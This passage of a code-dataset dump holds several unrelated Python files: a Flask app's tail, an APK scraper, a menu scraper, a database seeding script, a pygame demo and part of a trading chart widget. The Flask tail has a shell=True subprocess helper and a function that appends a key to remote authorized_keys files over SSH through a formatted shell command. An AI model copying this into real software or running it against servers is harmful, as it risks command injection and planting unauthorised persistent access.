send_from_directory(uploaded_dir,\n filename)\n\n\ndef calling(*args):\n # return subprocess.Popen(args, stdout=subprocess.PIPE).communicate()[0].rstrip()\n return subprocess.Popen(args, shell=True, stderr=subprocess.PIPE)\n\n\n# cmd = \"/bin/ssh-copy-id\" ' ' + \"-i\" + ' ' + \"pub_key\" + ' ' + result\n\n# result = username + '@' + hostname\n# calling('/bin/ssh-copy-id', '-i', 'pub_key', result)\n\n# deploys key on server\ndef deploy_key(key, server, username, password):\n client = paramiko.SSHClient()\n client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n client.connect(server, username=username, password=password)\n # client.exec_command('mkdir -p ~/.ssh/')\n client.exec_command('echo \"%s\" >> ~/.ssh/authorized_keys' % key)\n # client.exec_command('chmod 644 ~/.ssh/authorized_keys')\n # client.exec_command('chmod 700 ~/.ssh/')\n\n\n# key = open(os.path.dirname).read()\n# print(key)\n# username = os.getlogin()\n# password = getpass()\n# hosts = [\"hostname1\", \"hostname2\", \"hostname3\"]\n# for host in hosts:\n# deploy_key(key, host, username, password)\n\nif __name__ == \"__main__\":\n app.run(\n host=server_host,\n port=server_port,\n debug=server_debug\n )\n","sub_path":"web-app.py","file_name":"web-app.py","file_ext":"py","file_size_in_byte":3872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"201591834","text":"# coding=utf-8\nimport urllib\nimport requests\nimport re\nfrom bs4 import BeautifulSoup\nimport random\nimport time\nimport os\n\nuser_agent_list = [\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 \"\n \"(KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\",\n \"Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 \"\n \"(KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 \"\n \"(KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6\",\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 \"\n \"(KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6\",\n \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 \"\n \"(KHTML, like Gecko) Chrome/19.77.34.5 
Safari/537.1\",\n \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 \"\n \"(KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5\",\n \"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 \"\n \"(KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 \"\n \"(KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 \"\n \"(KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3\",\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 \"\n \"(KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 \"\n \"(KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 \"\n \"(KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 \"\n \"(KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 \"\n \"(KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 \"\n \"(KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 \"\n \"(KHTML, like Gecko) Chrome/19.0.1061.0 Safari/536.3\",\n \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.24 \"\n \"(KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24\",\n \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 \"\n \"(KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24\"\n]\n\ndef parser_apks(count=300):\n _root_url = \"https://www.apkmirror.com\" # 应用市场主页网址\n res_parser = {}\n # 设置爬取的页面,从第一页开始爬取,第一页爬完爬取第二页,以此类推\n page_num = 12\n while count:\n # 获取应用列表页面\n print(\"count=\" + str(count))\n wbdata = requests.get(\"https://www.apkmirror.com/page/\" + str(page_num)+ '/').text\n print(\"starting at page {}\".format(page_num))\n # 解析应用列表页面内容\n soup = BeautifulSoup(wbdata, \"html.parser\")\n links = soup.find_all(\"a\", class_=\"downloadLink\", alt=\"\")\n\n if len(links) == 0:\n print(\"==============links空了=================\")\n break\n\n for link in links:\n # 获取应用详情页面的链接\n opener = urllib.request.build_opener()\n # opener.addheaders = [('User-Agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30')]\n opener.addheaders = [('User-Agent', random.choice(user_agent_list))]\n urllib.request.install_opener(opener)\n detail_link = urllib.parse.urljoin(_root_url, str(link[\"href\"]))\n download_page = requests.get(detail_link).text\n time.sleep(2)\n # 解析应用详情页面\n soup1 = BeautifulSoup(download_page, \"html.parser\")\n play_link = soup1.find('a', title=\"View on Play Store\")\n if not play_link:\n continue\n play_link = play_link['href']\n package_name = play_link.split(\"=\")[1]\n # if not download_link or download_link == \"\":\n # soup2 = BeautifulSoup(download_page, \"html.parser\")\n # version_link = soup2.find(\"a\",style=re.compile(\"^color\"),href=re.compile(\"^/apk\"))\n # if version_link:\n # # 获取应用详情页面的链接\n # detail_link = urllib.parse.urljoin(_root_url, str(version_link[\"href\"]))\n # download_page = requests.get(detail_link).text\n # # 解析应用详情页面\n # soup3 = BeautifulSoup(download_page, \"html.parser\")\n # download_link = soup1.find(class_=\"btn btn-flat downloadButton\")\n # if not download_link:\n # continue\n # download_link = download_link[\"href\"]\n # # 获取直接下载的链接\n # download_url = urllib.parse.urljoin(_root_url, str(download_link))\n # 解析后会有重复的结果,通过判断去重\n if 
package_name not in res_parser.keys():\n if count > 0:\n res_parser[package_name] = play_link\n count = count - 1\n else:\n break\n if count == 0:\n break\n if count > 0:\n page_num = page_num + 1\n\n print(\"爬取apk数量为: \" + str(len(res_parser)))\n return res_parser\n\n\ndef craw_apks(count=300,save_path=os.path.join(os.pardir,\"apk\")):\n print(\"craw_apks count=\" + str(count))\n res_dic = parser_apks(count)\n res = []\n for key in res_dic.keys():\n res.append(res_dic[key])\n print(res)\n\nif __name__ == \"__main__\":\n category = 27\n # while category<=10:\n craw_apks(150)\n\n\n","sub_path":"droidbot-master/scripts/crawlApkMirror.py","file_name":"crawlApkMirror.py","file_ext":"py","file_size_in_byte":5814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"502541341","text":"\"\"\"\nVersion:0.3\n功能:读取指定文件,并输出由正则表达式所匹配出的文本。可以对文本进行调整。如果无需调整的话,就将调整的语句注释掉即可。\n已知兼容性:win10_1709_16299.371 X64/Python 3.6.5 32bit\n已知问题:目前之前对最外层的json数据进行解析。\n\n背景:\n有时候在对比两份报文差异的时候,由于json键值对儿的值在对比的时候往往不一样,所以将键提取出来,然后用VS Code来对比。就方便一些。\n\"\"\"\nimport json\n\ndef get_json_key(json_Data):\n json_dict = json.loads(json_Data)\n for x in json_dict.keys():\n print(x)","sub_path":"tools/util/get_json_key.py","file_name":"get_json_key.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"590301609","text":"from abc import ABCMeta, abstractmethod\n\n\nclass AbstractSocialClass(metaclass=ABCMeta):\n \"\"\"Abstract base class for social class.\"\"\"\n\n def __init__(self):\n self.name = \"\"\n self.rank = -1\n\n\nclass UpperClass(AbstractSocialClass):\n \"\"\"Rich people.\"\"\"\n\n def __init__(self):\n super().__init__()\n self.name = \"Upper class\"\n self.rank = 3\n\n\nclass MiddleClass(AbstractSocialClass):\n \"\"\"Average / Working class.\"\"\"\n\n def __init__(self):\n super().__init__()\n self.name = \"Middle class\"\n self.rank = 2\n\n\nclass LowerClass(AbstractSocialClass):\n \"\"\"Poor people.\"\"\"\n\n def __init__(self):\n super().__init__()\n self.name = \"Lower class\"\n self.rank = 1\n\n","sub_path":"src/social_class.py","file_name":"social_class.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"239115513","text":"import time, socket, urllib2, datetime\n\ndef getfoods(campus, day, restaurant):\n if (restaurant==0): restaurant=10\n elif (restaurant==1): restaurant=11\n day = day + 1\n parsedfoods=[]\n\n if (day>5):\n parsedfoods.append(\"Weekend.\")\n return parsedfoods\n try:\n url = \"http://www.unicafe.fi/lounas/?kampus=\" + str(campus) + \"&ravintola=\" + str(restaurant) + \"&paiva=\" + str(day)\n unicafe = urllib2.urlopen(url)\n source = unicafe.read()\n foods = source.split('
  • ')[1].split('')[0]\n foods = foods.split('
  • ')\n\n for food in foods:\n food = food.split('')[1].split('<')[0].split(' ')[0]\n parsedfoods.append(food + \" - \" + type)\n\n return parsedfoods\n except:\n parsedfoods.append(\"Either no food available or an error occured.\")\n return parsedfoods\n\ndef unicafe():\n\tday = time.localtime(time.time())[6]\n\thour = time.localtime(time.time())[3]\n\tover17=0\n\tif (hour>17):\n\t\tday=day+1\n\t\tover17=1\n\tdt=datetime.datetime.now()\n\tcurday=dt.day+over17\n\tif(curday==32): curday=1\n\tret=\"Food for: \" + str(curday) + \".\" + str(dt.month) + \".\" + str(dt.year) + \"\\n*----*\\n\"\n\tret+=\"Chemicum:\\n\"\n\ttry:\n\t\tparsedfoods = getfoods(3,day,0)\n\t\tfor food in parsedfoods:\n\t\t\tret+=food\n\t\t\tret+=\"\\n\"\n\texcept:\n\t\tret+=\"Either no food available or an error occured.\"\n\t\tret+=\"\\n\"\n\tret+=\"*----*\\n\"\n\tret+=\"Exactum:\\n\"\n\ttry:\n\t\tparsedfoods = getfoods(3,day,1)\n\t\tfor food in parsedfoods:\n\t\t\tret+=food\n\t\t\tret+=\"\\n\"\n\texcept:\n\t\tret+=\"Either no food available or an error occured.\"\n\t\tret+=\"\\n\"\n\n\treturn ret\n\ndef unicafe_centre():\n\tday = time.localtime(time.time())[6]\n\thour = time.localtime(time.time())[3]\n\tover17=0\n\tif (hour>17):\n\t\tday=day+1\n\t\tover17=1\n\tdt=datetime.datetime.now()\n\tcurday=dt.day+over17\n\tif(curday==32): curday=1\n\tret=\"Food for: \" + str(curday) + \".\" + str(dt.month) + \".\" + str(dt.year) + \"\\n*----*\\n\"\n\tret+=\"Ylioppilasaukio:\\n\"\n\ttry:\n\t\tparsedfoods = getfoods(1,day,8)\n\t\tfor food in parsedfoods:\n\t\t\tret+=food\n\t\t\tret+=\"\\n\"\n\texcept:\n\t\tret+=\"Either no food available or an error occured.\"\n\t\tret+=\"\\n\"\n\tret+=\"*----*\\n\"\n\tret+=\"Porthania:\\n\"\n\ttry:\n\t\tparsedfoods = getfoods(1,day,3)\n\t\tfor food in parsedfoods:\n\t\t\tret+=food\n\t\t\tret+=\"\\n\"\n\texcept:\n\t\tret+=\"Either no food available or an error occured.\"\n\t\tret+=\"\\n\"\n\n\treturn ret\n","sub_path":"unicafe.py","file_name":"unicafe.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"43046348","text":"from dao.orm.model import *\nfrom dao.db import OracleDb\n\ndb = OracleDb()\n\nBase.metadata.create_all(db.sqlalchemy_engine)\n\nsession = db.sqlalchemy_session\n\n# clear all tables in right order\nsession.query(ormUserAttendedEvent).delete()\nsession.query(ormEvent).delete()\nsession.query(ormUser).delete()\n\n\nsession.add_all([\n ormUser(user_name='johnsmith', user_email='john@gmail.com', user_first_name='John', user_last_name='Smith'),\n ormUser(user_name='topsy', user_email='top@gmail.com', user_first_name='Topsy', user_last_name='Daiver'),\n ormUser(user_name='clark', user_email='kent@gmail.com', user_first_name='Clark', user_last_name='Kent'),\n ormUser(user_name='Ann', user_email='ann@gmail.com', user_first_name='Ann', user_last_name='Smith'),\n ormEvent(event_name='Atlas', event_date='10-OCT-2018', ),\n ormEvent(event_name='Zahid', event_date='10-SEP-2010', ),\n ormEvent(event_name='Sziget', event_date='10-FEB-2010', ),\n])\n\nevent = session.query(ormEvent).first()\nevent.orm_users.append(session.query(ormUser).first())\n\nsession.commit()\n","sub_path":"km-63/Мілевська/source/dao/orm/populate.py","file_name":"populate.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"283683032","text":"import pygame\nimport sys\n\nnow_angle = 0\nset_angle = 0\n\nRIGHT_X = 45\n\nLEFT_X = 
-45\n\nset_x = 0\n\nnow_x = 0\nnow_y = 0\n\nWIDTH = 200\nHEIGHT = 200\n\npygame.init()\nwindow = pygame.display.set_mode((WIDTH + 100, HEIGHT))\npygame.display.set_caption(\"Cessna 172\")\n\n\n\nCOLOR_INACTIVE = pygame.Color('lightskyblue3')\nCOLOR_ACTIVE = pygame.Color('dodgerblue2')\nFONT = pygame.font.Font(None, 32)\n\n\nclass InputBox:\n\n def __init__(self, x, y, w, h, text=''):\n self.rect = pygame.Rect(x, y, w, h)\n self.color = COLOR_INACTIVE\n self.text = text\n self.txt_surface = FONT.render(text, True, self.color)\n self.INPUT = 0\n self.active = False\n\n def handle_event(self, event):\n if event.type == pygame.MOUSEBUTTONDOWN:\n if self.rect.collidepoint(event.pos):\n self.active = not self.active\n else:\n self.active = False\n self.color = COLOR_ACTIVE if self.active else COLOR_INACTIVE\n if event.type == pygame.KEYDOWN:\n if self.active:\n if event.key == pygame.K_RETURN:\n \n # Update INPUT\n self.INPUT = self.text\n\n self.text = ''\n elif event.key == pygame.K_BACKSPACE:\n self.text = self.text[:-1]\n else:\n self.text += event.unicode\n # Re-render the text.\n self.txt_surface = FONT.render(self.text, True, self.color)\n\n def update(self):\n width = max(35, self.txt_surface.get_width() + 10)\n self.rect.w = width\n\n def draw(self, screen):\n screen.blit(self.txt_surface, (self.rect.x + 5, self.rect.y + 5))\n pygame.draw.rect(screen, self.color, self.rect, 2)\n\n\n\n\n\npp = pygame.image.load(\"ninfly.png\")\nppRect = pp.get_rect()\nppRect = ppRect.move((WIDTH - ppRect.width) / 2, (HEIGHT - ppRect.height) / 2)\npygame.display.update()\n\ninput_box = InputBox(220, 90, 32, 32)\n\nflag = True\nwhile flag:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n input_box.handle_event(event)\n\n if now_angle > set_angle:\n now_angle -= 0.5\n if now_angle < set_angle:\n now_angle = set_angle\n if now_angle < set_angle:\n now_angle += 0.5\n if now_angle > set_angle:\n now_angle = set_angle\n \n newpp = pygame.transform.rotate(pp, now_angle)\n\n newRect = newpp.get_rect(center = ppRect.center)\n\n\n if input_box.INPUT == 'L' :\n set_angle = 20\n set_x = RIGHT_X\n elif input_box.INPUT == 'R':\n set_angle = -20\n set_x = LEFT_X\n elif input_box.INPUT != '' :\n set_angle = 0\n set_x = 0\n\n if set_x > now_x:\n now_x += 0.9 * 1.2\n if now_x > set_x:\n now_x = set_x\n elif set_x < now_x:\n now_x -= 0.9 * 1.2\n if now_x < set_x:\n now_x = set_x\n\n if now_x > 0:\n now_y = -now_x / 9.0\n else:\n now_y = now_x / 9.0\n \n\n window.fill((111,111,111))\t\n img = pygame.image.load(\"nin.png\")\n mou = pygame.image.load(\"ninmou.png\")\n window.blit(img, (0, 0))\n window.blit(newpp, newRect)\n window.blit(mou, (now_x, now_y))\n\n \n input_box.update()\n input_box.draw(window)\n \n pygame.display.flip()\n pygame.display.update()\n","sub_path":"shift.py","file_name":"shift.py","file_ext":"py","file_size_in_byte":3387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"346881631","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport pandas as pd\nfrom collections import deque\nfrom datetime import datetime\n# 其他\nfrom functools import partial\n\nfrom qtpy import QtWidgets, QtGui, QtCore\nfrom qtpy.QtCore import *\n# Qt相关和十字光标\nfrom qtpy.QtGui import *\nfrom qtpy.QtWidgets import QApplication\n\nfrom uiCrosshair import Crosshair\nfrom vnpy.trader.IndicatorsFun.indicatorsManage import IndicatorsFunManage\nfrom vnpy.trader.IndicatorsFun.algo.vtIndictors import VtIndicatorsData\n\nfrom 
vnpy.trader.widget.IndicatorsCustomMenu import CustomMenu\nimport pyqtgraph as pg\n\n# 字符串转换\n# ---------------------------------------------------------------------------------------\ntry:\n _fromUtf8 = QtCore.QString.fromUtf8\nexcept AttributeError:\n def _fromUtf8(s):\n return s\n\n\n########################################################################\n# 键盘鼠标功能\n########################################################################\nclass KeyWraper(QtWidgets.QWidget):\n \"\"\"键盘鼠标功能支持的元类\"\"\"\n\n # 初始化\n # ----------------------------------------------------------------------\n def __init__(self, parent=None):\n QtWidgets.QWidget.__init__(self, parent)\n\n # 重载方法keyPressEvent(self,event),即按键按下事件方法\n # ----------------------------------------------------------------------\n def keyPressEvent(self, event):\n if event.key() == QtCore.Qt.Key_Up:\n self.onUp()\n elif event.key() == QtCore.Qt.Key_Down:\n self.onDown()\n elif event.key() == QtCore.Qt.Key_Left:\n self.onLeft()\n elif event.key() == QtCore.Qt.Key_Right:\n self.onRight()\n elif event.key() == QtCore.Qt.Key_PageUp:\n self.onPre()\n elif event.key() == QtCore.Qt.Key_PageDown:\n self.onNxt()\n\n # 重载方法mousePressEvent(self,event),即鼠标点击事件方法\n # ----------------------------------------------------------------------\n def mousePressEvent(self, event):\n\n if event.button() == QtCore.Qt.RightButton:\n self.onRClick(event.pos())\n elif event.button() == QtCore.Qt.LeftButton:\n self.onLClick(event.pos())\n\n # 重载方法mouseReleaseEvent(self,event),即鼠标点击事件方法\n # ----------------------------------------------------------------------\n def mouseReleaseEvent(self, event):\n\n if event.button() == QtCore.Qt.RightButton:\n self.onRRelease(event.pos())\n elif event.button() == QtCore.Qt.LeftButton:\n self.onLRelease(event.pos())\n self.releaseMouse()\n\n # 重载方法wheelEvent(self,event),即滚轮事件方法\n # ----------------------------------------------------------------------\n def wheelEvent(self, event):\n\n if event.delta() > 0:\n self.onUp()\n else:\n self.onDown()\n\n # 重载方法dragMoveEvent(self,event),即拖动事件方法\n # ----------------------------------------------------------------------\n def paintEvent(self, event):\n self.onPaint()\n\n # PgDown键\n # ----------------------------------------------------------------------\n def onNxt(self):\n pass\n\n # PgUp键\n # ----------------------------------------------------------------------\n def onPre(self):\n pass\n\n # 向上键和滚轮向上\n # ----------------------------------------------------------------------\n def onUp(self):\n pass\n\n # 向下键和滚轮向下\n # ----------------------------------------------------------------------\n def onDown(self):\n pass\n\n # 向左键\n # ----------------------------------------------------------------------\n def onLeft(self):\n pass\n\n # 向右键\n # ----------------------------------------------------------------------\n def onRight(self):\n pass\n\n # 鼠标左单击\n # ----------------------------------------------------------------------\n def onLClick(self, pos):\n pass\n\n # 鼠标右单击\n # ----------------------------------------------------------------------\n def onRClick(self, pos):\n pass\n\n # 鼠标左释放\n # ----------------------------------------------------------------------\n def onLRelease(self, pos):\n pass\n\n # 鼠标右释放\n # ----------------------------------------------------------------------\n def onRRelease(self, pos):\n pass\n\n # 画图\n # ----------------------------------------------------------------------\n def onPaint(self):\n 
pass\n\n\n########################################################################\n# 选择缩放功能支持\n########################################################################\nclass CustomViewBox(pg.ViewBox):\n # ----------------------------------------------------------------------\n def __init__(self, parent, *args, **kwds):\n pg.ViewBox.__init__(self, *args, **kwds)\n self.parent = parent\n # 拖动放大模式\n # self.setMouseMode(self.RectMode)\n\n ## 右键自适应\n # ----------------------------------------------------------------------\n def mouseClickEvent(self, ev):\n\n if ev.button() == QtCore.Qt.RightButton:\n self.contextMenuEvent(ev) # 右键菜单\n # if ev.button()==QtCore.Qt.LeftButton:\n # self.autoRange()\n # 重载方法mousePressEvent(self,event),即鼠标点击事件方法\n # ----------------------------------------------------------------------\n def mousePressEvent(self, event):\n\n pg.ViewBox.mousePressEvent(self, event)\n\n # 重载方法mouseDragEvent(self,event),即拖动事件方法\n def mouseDragEvent(self, ev, axis=None):\n # if ev.start==True and ev.finish==False: ##判断拖拽事件是否结束\n pos = ev.pos()\n lastPos = ev.lastPos()\n dif = pos - lastPos\n\n rect = self.sceneBoundingRect()\n\n pianyi = dif.x() * self.parent.countK * 2 / rect.width()\n\n self.parent.index -= int(pianyi)\n self.parent.index = max(self.parent.index, 60)\n xMax = self.parent.index + self.parent.countK ##\n xMin = self.parent.index - self.parent.countK\n if xMin < 0:\n xMin = 0\n\n # self.parent.plotAll(False, xMin, xMax) #注释原因:拖动事件不需要先绘���图形界面\n\n pg.ViewBox.mouseDragEvent(self, ev, axis)\n # ## 重载方法resizeEvent(self, ev)\n\n def resizeEvent(self, ev):\n self.linkedXChanged()\n self.linkedYChanged()\n self.updateAutoRange()\n self.updateViewRange()\n self._matrixNeedsUpdate = True\n self.sigStateChanged.emit(self)\n self.background.setRect(self.rect())\n self.sigResized.emit(self)\n self.parent.refreshHeight()\n ###加载指标\n def contextMenuEvent(self,ev):\n \"\"\"打开指标窗口\"\"\"\n CustomMenu(self.parent)\n\n########################################################################\n# 时间序列,横坐标支持\n########################################################################\nclass MyStringAxis(pg.AxisItem):\n \"\"\"时间序列横坐标支持\"\"\"\n\n # 初始化\n # ----------------------------------------------------------------------\n def __init__(self, xdict, *args, **kwargs):\n pg.AxisItem.__init__(self, *args, **kwargs)\n self.minVal = 0\n self.maxVal = 0\n self.xdict = xdict\n self.x_values = np.asarray(xdict.keys())\n self.x_strings = xdict.values()\n self.setPen(color=(255, 255, 255, 255), width=0.8)\n self.setStyle(tickFont=QFont(\"Roman times\", 10, QFont.Bold), autoExpandTextSpace=True)\n\n # 更新坐标映射表\n # ----------------------------------------------------------------------\n def update_xdict(self, xdict):\n self.xdict.update(xdict)\n self.x_values = np.asarray(self.xdict.keys())\n self.x_strings = self.xdict.values()\n\n # 将原始横坐标转换为时间字符串,第一个坐标包含日期\n # ----------------------------------------------------------------------\n def tickStrings(self, values, scale, spacing):\n strings = []\n for v in values:\n vs = v * scale\n if vs in self.x_values:\n vstr = self.x_strings[np.abs(self.x_values - vs).argmin()]\n if (isinstance(vstr, (str))):\n vstr = vstr\n else:\n vstr = vstr.strftime('%Y-%m-%d %H:%M:%S')\n else:\n vstr = \"\"\n strings.append(vstr)\n return strings\n\n\n########################################################################\n# K线图形对象\n########################################################################\nclass CandlestickItem(pg.GraphicsObject):\n \"\"\"K线图形对象\"\"\"\n\n # 初始化\n 
# ----------------------------------------------------------------------\n def __init__(self, data):\n\n \"\"\"初始化\"\"\"\n pg.GraphicsObject.__init__(self)\n\n # 数据格式: [ (time, open, close, low, high),...]\n self.data = data\n # 只重画部分图形,大大提高界面更新速度\n self.setFlag(self.ItemUsesExtendedStyleOption)\n # 画笔和画刷\n w = 0.4\n self.offset = 0\n self.low = 0\n self.high = 1\n self.picture = QtGui.QPicture()\n self.pictures = []\n self.bPen = pg.mkPen(color=(0, 240, 240, 255), width=w * 2)\n self.bBrush = pg.mkBrush((0, 240, 240, 255))\n self.rPen = pg.mkPen(color=(255, 60, 60, 255), width=w * 2)\n self.rBrush = pg.mkBrush((255, 60, 60, 255))\n self.rBrush.setStyle(Qt.NoBrush)\n # 刷新K线\n self.generatePicture(self.data)\n\n # 画K线\n # ----------------------------------------------------------------------\n def generatePicture(self, data=None, redraw=False):\n \"\"\"重新生成图形对象\"\"\"\n # 重画或者只更新最后一个K线\n if redraw:\n self.pictures = []\n elif self.pictures:\n self.pictures.pop()\n w = 0.4\n bPen = self.bPen\n bBrush = self.bBrush\n rPen = self.rPen\n rBrush = self.rBrush\n low, high = (data[0]['low'], data[0]['high']) if len(data) > 0 else (0, 1)\n for (t, open0, close0, low0, high0) in data:\n if t >= len(self.pictures):\n\n tShift = t\n\n low, high = (min(low, low0), max(high, high0))\n picture = QtGui.QPicture()\n p = QtGui.QPainter(picture)\n # # 下跌蓝色(实心), 上涨红色(空心)\n pen, brush, pmin, pmax = (bPen, bBrush, close0, open0) \\\n if open0 > close0 else (rPen, rBrush, open0, close0)\n p.setPen(pen)\n p.setBrush(brush)\n # 画K线方块和上下影线\n if pmin > low0:\n p.drawLine(QtCore.QPointF(tShift, low0), QtCore.QPointF(tShift, pmin))\n if high0 > pmax:\n p.drawLine(QtCore.QPointF(tShift, pmax), QtCore.QPointF(tShift, high0))\n p.drawRect(QtCore.QRectF(tShift - w, open0, w * 2, close0 - open0))\n # if open0 == close0:\n # p.drawRect(QtCore.QPointF(tShift - w, open0), QtCore.QPointF(tShift + w, close0))\n # else:\n # p.drawRect(QtCore.QRectF(tShift - w, open0, w * 2, close0 - open0))\n # if pmin > low0:\n # p.drawLine(QtCore.QPointF(tShift, low0), QtCore.QPointF(tShift, pmin))\n # if high0 > pmax:\n # p.drawLine(QtCore.QPointF(tShift, pmax), QtCore.QPointF(tShift, high0))\n p.end()\n\n self.pictures.append(picture)\n self.low, self.high = low, high\n\n # 手动重画\n # ----------------------------------------------------------------------\n def update(self):\n if not self.scene() is None:\n self.scene().update()\n\n # 自动重画\n # ----------------------------------------------------------------------\n def paint(self, p, o, w):\n rect = o.exposedRect\n xmin, xmax = (max(0, int(rect.left())), min(len(self.pictures), int(rect.right())))\n\n [p.drawPicture(0, 0, pic) for pic in self.pictures[xmin:xmax]]\n\n # 定义边界\n # ----------------------------------------------------------------------\n def boundingRect(self):\n return QtCore.QRectF(0, self.low, len(self.pictures), (self.high - self.low))\n\n\n########################################################################\nclass KLineWidget(KeyWraper):\n \"\"\"用于显示价格走势图\"\"\"\n\n listBar = []\n listVol = []\n listClose=[]\n listOpen=[]\n listHigh = []\n listLow = []\n listSig = []\n listOpenInterest = []\n arrows = []\n\n # 是否完成了历史数据的读取\n initCompleted = False\n\n # ----------------------------------------------------------------------\n def __init__(self, parent=None, name=None):\n \"\"\"Constructor\"\"\"\n self.parent = parent\n self.name = name\n super(KLineWidget, self).__init__(parent)\n\n # 当前序号\n self.index = None # 下标\n self.countK = 60 # 显示的K线范围\n 
self.oldsize=0#rectd的hieght\n\n\n\n # 缓存数据\n\n\n self.datas = []\n self.listBar = []\n self.listVol = []\n self.listHigh = []\n self.listLow = []\n self.listSig = []\n self.listOpenInterest = []\n self.indicatorsFunManage= IndicatorsFunManage(self)\n self.arrows = []\n self.sars = []\n\n # 所有K线上信号图\n self.allColor = deque(['blue', 'green', 'yellow', 'white'])\n self.sigData = {}\n self.sigColor = {}\n self.sigPlots = {}\n\n # 初始化完成\n self.initCompleted = False\n\n # 调用函数\n self.initUi()\n\n # ----------------------------------------------------------------------\n # 初始化相关\n # ----------------------------------------------------------------------\n def initUi(self):\n \"\"\"初始化界面\"\"\"\n self.setWindowTitle(u'K线工具')\n # 主图\n self.pw = pg.PlotWidget()\n # 界面布局\n self.lay_KL = pg.GraphicsLayout(border=(100, 100, 100))\n self.lay_KL.setContentsMargins(10, 10, 10, 10)\n self.lay_KL.setSpacing(0)\n self.lay_KL.setBorder(color=(255, 255, 255, 255), width=0.8)\n self.lay_KL.setZValue(0)\n self.lay_KL.setMinimumHeight(140)\n self.KLtitle = self.lay_KL.addLabel(u'')\n self.pw.setCentralItem(self.lay_KL)\n # 设置横坐标\n xdict = {}\n self.axisTime = MyStringAxis(xdict, orientation='bottom')\n # 初始化子图\n self.initplotKline()\n self.initplotVol()\n self.initplotOI()\n # 注册十字光标\n self.crosshair = Crosshair(self.pw, self)\n # 设置界面\n self.vb = QtWidgets.QVBoxLayout()\n self.vb.addWidget(self.pw)\n self.setLayout(self.vb)\n # 初始化完成\n self.initCompleted = True\n self.oldsize=self.rect().height()\n\n self.customBox = {}\n\n # ----------------------------------------------------------------------\n def makePI(self, name):\n \"\"\"生成PlotItem对象\"\"\"\n vb = CustomViewBox(self)\n plotItem = pg.PlotItem(viewBox=vb, name=name, axisItems={'bottom': self.axisTime})\n plotItem.setMenuEnabled(False)\n plotItem.setClipToView(True)\n plotItem.hideAxis('left')\n plotItem.showAxis('right')\n plotItem.setDownsampling(mode='peak')\n plotItem.setRange(xRange=(0, 1), yRange=(0, 1))\n plotItem.getAxis('right').setWidth(60)\n plotItem.getAxis('right').setStyle(tickFont=QFont(\"Roman times\", 10, QFont.Bold))\n plotItem.getAxis('right').setPen(color=(255, 255, 255, 255), width=0.8)\n plotItem.showGrid(True, True)\n plotItem.hideButtons()\n\n return plotItem\n\n # ----------------------------------------------------------------------\n def initplotVol(self):\n \"\"\"初始化成交量��图\"\"\"\n self.pwVol = self.makePI('PlotVol' + self.name)\n self.volume = CandlestickItem(self.listVol)\n self.pwVol.addItem(self.volume)\n self.pwVol.setMaximumHeight((self.rect().height()-30)/4)\n self.pwVol.setMinimumHeight(12)\n self.pwVol.setXLink('PlotOI' + self.name)\n self.pwVol.hideAxis('bottom')\n self.lay_KL.nextRow()\n self.lay_KL.addItem(self.pwVol)\n self.lay_KL.adjustSize()\n\n\n # ----------------------------------------------------------------------\n def initplotKline(self):\n \"\"\"初始化K线子图\"\"\"\n self.pwKL = self.makePI('PlotKL' + self.name)\n 